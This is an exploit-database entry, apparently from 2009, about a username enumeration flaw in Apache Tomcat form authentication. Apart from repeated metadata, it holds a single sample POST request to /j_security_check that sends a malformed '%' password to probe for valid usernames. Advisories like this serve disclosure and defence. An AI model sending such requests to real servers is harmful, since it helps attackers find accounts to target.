Apache Tomcat - Form Authentication 'Username' Enumeration
| EKU-ID: 17667 | CVE: | OSVDB-ID: |
| Author: D. Matscheko | Published: 2009-11-09 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17667 | CVE: | OSVDB-ID: |
| Author: D. Matscheko | Published: 2009-11-09 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Attackers can use readily available tools to exploit this issue. The following example POST data is available: POST /j_security_check HTTP/1.1 Host: www.example.com j_username=tomcat&j_password=%